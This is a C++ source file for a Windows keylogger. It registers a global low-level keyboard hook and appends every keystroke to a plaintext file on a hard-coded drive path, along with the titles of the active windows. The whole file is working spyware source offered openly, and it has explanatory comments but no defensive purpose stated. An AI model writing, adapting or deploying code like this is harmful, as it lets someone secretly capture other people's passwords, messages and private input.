1/**
2* A very basic Key logger in C++
3**/
4
5// Include header files
6#include <windows.h>
7#include <fstream>
8// Define VK - find corresponding values here: http://msdn.microsoft.com/en-us/library/dd375731%28v=VS.85%29.aspx
9#define VK_OEM_PLUS 0xBB
10// Similarly define plus, comma, period
11
// Handle returned by SetWindowsHookEx in WinMain; Exit() passes it to
// UnhookWindowsHookEx. File-scope, so it starts out as NULL.
HHOOK KeyboardHook = NULL;
14
// Append the NUL-terminated string `c` to the log file.
//
// The destination is a fixed, hard-coded path and the content is stored as
// plain text. The file is opened and closed on every call, so each logged
// key produces its own open/append/close sequence on that path. If the file
// cannot be opened the text is dropped without any error being reported.
void write(const char* c)
{
    FILE* logFile = fopen("F:\\log.txt", "a+");
    if (logFile == NULL)
    {
        return; // nothing to write to
    }

    fputs(c, logFile);
    fclose(logFile);
}
26
// Pump the calling thread's Win32 message queue until GetMessage returns 0.
//
// WinMain calls this right after installing the keyboard hook; the loop is
// what keeps the process running while the hook is in place.
void KeepAlive()
{
    MSG msg;
    for (;;)
    {
        if (!GetMessage(&msg, NULL, 0, 0))
        {
            break;
        }
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
}
37
// Remove the keyboard hook stored in KeyboardHook, then terminate the
// process with exit status 0. Does not return.
void Exit()
{
    UnhookWindowsHookEx(KeyboardHook);

    exit(0);
}
44
// State shared between calls of keyboardHookProc.

// Title of the foreground window as last read by GetWindowTextA.
char cWindow[MAX_PATH];
// Foreground window seen on the previous logged key press (NULL until the first one).
HWND oldWindow = NULL;
// Shift state tracked from VK_LSHIFT / VK_RSHIFT events seen by the hook.
bool shift = false;
51
// Low-level keyboard hook callback, registered for WH_KEYBOARD_LL in WinMain.
//
// Parameters follow the hook procedure contract: nCode is the hook code,
// wParam the keyboard message identifier, lParam a pointer to a
// KBDLLHOOKSTRUCT describing the key event. The event is always forwarded
// with CallNextHookEx, and that call's result is returned.
//
// For nCode == HC_ACTION the callback:
//   1. updates the global `shift` flag on left/right shift events,
//   2. calls Exit() when F12 arrives while CTRL is reported down,
//   3. on WM_KEYDOWN / WM_SYSKEYDOWN, writes "\nActive Window: <title>\n"
//      whenever the foreground window differs from the previous one, then
//      writes a text representation of the key.
//
// What this leaves on disk (through write()): a plaintext stream of window
// titles interleaved with typed characters and bracketed key names such as
// "[BACKSPACE]" or "[CTRL]".
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    // Sampled on every invocation, before the hook code is inspected.
    const bool capsActive = GetKeyState(VK_CAPITAL) < 0;
    KBDLLHOOKSTRUCT* kbd = (KBDLLHOOKSTRUCT*)lParam;

    if (nCode != HC_ACTION)
    {
        // Not a keyboard action for us: forward the event untouched.
        return CallNextHookEx(NULL, nCode, wParam, lParam);
    }

    const DWORD vk = kbd->vkCode;

    // Track the shift flag from the shift keys' own events.
    if (vk == VK_LSHIFT || vk == VK_RSHIFT)
    {
        shift = (wParam == WM_KEYDOWN);
    }

    // Top bit of GetAsyncKeyState's SHORT result, moved down to a boolean.
    bool ctrlDown = GetAsyncKeyState(VK_CONTROL) >> ((sizeof(SHORT) * 8) - 1);
    if (vk == VK_F12 && ctrlDown)
    {
        Exit(); // CTRL + F12: unhook and terminate
    }

    if (wParam != WM_SYSKEYDOWN && wParam != WM_KEYDOWN)
    {
        // Only key presses are logged.
        return CallNextHookEx(NULL, nCode, wParam, lParam);
    }

    // Record the foreground window title whenever it changes.
    HWND newWindow = GetForegroundWindow();
    if (oldWindow == NULL || newWindow != oldWindow)
    {
        GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
        write("\nActive Window: ");
        write(cWindow);
        write("\n");
        oldWindow = newWindow;
    }

    // Virtual key codes reference: http://msdn.microsoft.com/en-us/library/dd375731%28v=VS.85%29.aspx
    if (vk >= 0x30 && vk <= 0x39)
    {
        // Top-row digits; with shift, the symbol printed on the same key.
        static const char shiftedDigits[] = ")!@#$%^&*(";
        char text[2] = { 0, 0 };
        text[0] = shift ? shiftedDigits[vk - 0x30] : (char)('0' + (vk - 0x30));
        write(text);
    }
    else if (vk >= 0x60 && vk <= 0x69)
    {
        // Numpad digits, independent of shift.
        char text[2] = { 0, 0 };
        text[0] = (char)('0' + (vk - 0x60));
        write(text);
    }
    else if (vk >= 0x41 && vk <= 0x5A)
    {
        // Letters: upper case when exactly one of caps / shift is set.
        const bool upper = (capsActive != shift);
        char text[2] = { 0, 0 };
        text[0] = (char)((upper ? 'A' : 'a') + (vk - 0x41));
        write(text);
    }
    else
    {
        switch (vk)
        {
        // Whitespace and editing / navigation keys
        case VK_SPACE:  write(" ");  break;
        case VK_RETURN: write("\n"); break;
        case VK_TAB:    write("\t"); break;
        case VK_ESCAPE: write("[ESC]"); break;
        case VK_LEFT:   write("[LEFT]"); break;
        case VK_RIGHT:  write("[RIGHT]"); break;
        case VK_UP:     write("[UP]"); break;
        case VK_DOWN:   write("[DOWN]"); break;
        case VK_END:    write("[END]"); break;
        case VK_HOME:   write("[HOME]"); break;
        case VK_DELETE: write("[DELETE]"); break;
        case VK_BACK:   write("[BACKSPACE]"); break;
        case VK_INSERT: write("[INSERT]"); break;

        // Modifier keys
        case VK_LCONTROL:
        case VK_RCONTROL:
            write("[CTRL]");
            break;
        case VK_LMENU:
        case VK_RMENU:
            write("[ALT]");
            break;

        // Function keys
        case VK_F1:  write("[F1]"); break;
        case VK_F2:  write("[F2]"); break;
        case VK_F3:  write("[F3]"); break;
        case VK_F4:  write("[F4]"); break;
        case VK_F5:  write("[F5]"); break;
        case VK_F6:  write("[F6]"); break;
        case VK_F7:  write("[F7]"); break;
        case VK_F8:  write("[F8]"); break;
        case VK_F9:  write("[F9]"); break;
        case VK_F10: write("[F10]"); break;
        case VK_F11: write("[F11]"); break;
        case VK_F12: write("[F12]"); break;

        // Shift itself produces no output; it only feeds the `shift` flag.
        case VK_LSHIFT:
        case VK_RSHIFT:
            break;

        // Punctuation keys
        case VK_OEM_1:      write(shift ? ":" : ";"); break;
        case VK_OEM_2:      write(shift ? "?" : "/"); break;
        case VK_OEM_3:      write(shift ? "~" : "`"); break;
        case VK_OEM_4:      write(shift ? "{" : "["); break;
        case VK_OEM_5:      write(shift ? "|" : "\\"); break;
        case VK_OEM_6:      write(shift ? "}" : "]"); break;
        case VK_OEM_7:      write(shift ? "\"" : "'"); break;
        case VK_OEM_PLUS:   write(shift ? "+" : "="); break;
        case VK_OEM_COMMA:  write(shift ? "<" : ","); break;
        case VK_OEM_MINUS:  write(shift ? "_" : "-"); break;
        case VK_OEM_PERIOD: write(shift ? ">" : "."); break;

        default:
        {
            // Any other key: build the GetKeyNameText argument from the
            // event's scan code and flags and log the returned name.
            DWORD dwMsg = kbd->scanCode << 16;
            dwMsg += kbd->flags << 24;
            char key[16];
            GetKeyNameText(dwMsg, key, 15);
            write(key);
            break;
        }
        }
    }

    // Forward the event to other hooks
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}
199
// Program entry point.
//
// Writes a "\n--" separator to the log, then installs keyboardHookProc as a
// WH_KEYBOARD_LL hook with thread id NULL (0), i.e. not bound to one thread.
// The SetWindowsHookEx(WH_KEYBOARD_LL, ...) call is the point at which the
// process starts receiving keyboard events. If the hook is installed, the
// message loop runs until the process is ended from the callback (CTRL + F12)
// or GetMessage returns 0. Always returns 0.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
    write("\n--");

    KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL);
    if (KeyboardHook == NULL)
    {
        // Hook installation failed: nothing to keep alive.
        return 0;
    }

    KeepAlive();
    return 0;
}